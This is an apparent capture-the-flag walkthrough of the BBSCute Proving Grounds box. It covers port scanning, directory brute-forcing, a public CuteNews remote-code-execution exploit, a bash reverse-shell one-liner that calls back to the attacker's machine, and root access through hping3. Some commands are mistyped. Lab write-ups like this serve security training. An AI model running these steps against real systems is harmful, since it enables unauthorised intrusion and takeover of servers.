PG — BBSCute— Walkthrough (Offensive Security Proving Grounds Play Boxes)
Introduction
This article aims to walk you through BBSCute box, created by foxlox and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving Grounds Play or Practice can try to pwn this Linux box, this is a kind of boot2root, easy, and fun box. Hope you enjoy reading the walkthrough!
Reconnaissance
As we are already provided with IP address of the box, we will scan it via Nmap.
Scanning
We are going to scan the IP for 1000 default ports by typing the following command on our terminal.
nmap 192.168.x.x
After a short while, we have got our results as shown below:
To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.
nmap -p 22,80,88,110,995 192.168.x.x -sV -sC
In a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on port 80 as there is a default apache web server since port 22 is not a logical starting point because it does not provide us with a broad attack surface as an http server does. Port 88, hosting an nginx web server but it throws out 404 Not Found error while trying to connect, is an hhtp server as well, but it does not reveal anything to our interest. Ports 110 and 995 also do not provide us with any useful path to follow.
Enumeration
We open our browser and type IP address of the box.
Now, we will use gobuster to bruteforce directories to see if we have something useful. We will use -u argument to specify URL and -w argument to provide the wordlist we want to use for directory bruteforcing. And not to create a noise on the server or not to be blocked by the firewall if there is one on the server, we will specify threads as 5 by -t argument.
gobuster dir -u http://192.168x.x/ -w /usr/share/wordlists/dirb/common.txt -t 5
Gobuster reveals several directories, but the only useful one is index.php, and it uncovers a login page.
After trying to log in with common credentials such as admin:admin, we are not able to log in on the server. Then, we see that under login section of the web page, the name and version number of CMS are visible, which will be investigated further.
Thus, we searchsploit the name and version number on our terminal in order to see if there is a public exploit.
There are four different public exploits, we will not use Metasploit to maintain our skills sharp and check python script, which is 48800.py, as it gives us the opportunity to have Remote Code Execution (RCE) on the server.
Before attempting to use, we need to change several lines of the exploit code to make it work for our web server. So, the first line, which needs to be altered, is shown below;
As we do not have a directory called /CuteNews on our web server, we will delete it for this and for the following lines, otherwise our python script will not work!
We are ready to exploit the web server via the python script we edited.
Exploitation
We execute our python script to connect to the web server:
python3 48800.py
The exploit asks for URL of the web server we want to exploit and we provide it. After typing our URL, we hit enter, and we get command execution on the web server.
To have a netcat shell, we set up a netcat listener on port 443, which is a trustable and secure port, and often works for a reverse shell, in our terminal.
Then, we type the following command to execute on the server for a reverse shell.
echo ‘bash -i >& /dev/tcp192.168.x.x/443 0>&1’ | bash
And, we have got a netcat shell on the web server.
Now, we can look for our low shell hash with the following command and concatenate it.
find / -name local.txt 2>/dev/null
Privilege Escalation
Privilege Escalation of this box was easy, there are some initial enumeration steps for privilege escalation after getting low shell, and the first one tried on this box, which was checking sudo permissions for the current user by typing sudo -l on the terminal, is the first step for privilege escalation.
We see that we can execute hping3 with sudo permissions.
Since our low shell is not a TTY shell, we are not able to execute hping3. We will try to get a TTY shell from an interpreter.
We execute /bin/sh -i, and get a TTY shell with the following command.
python3 -c “__import__(‘’pty).spawn(‘/bin/bash’)”
Now, we are able to execute hping3, and if we execute it as sudo -l output suggest, it will ask for a password. Since we also see that hping3 has SUID binaries, we check GTFOBins, and see that we are able to execute commands as root user via hping3 terminal.
We will get hping3 terminal through just typing hping3, and then we will escalate our privilege as shown below.
As we see, we are able to execute commands as root since our Effective User Id is root. So let us concatenate root hash.
Now we have full authority on the box. Enjoy!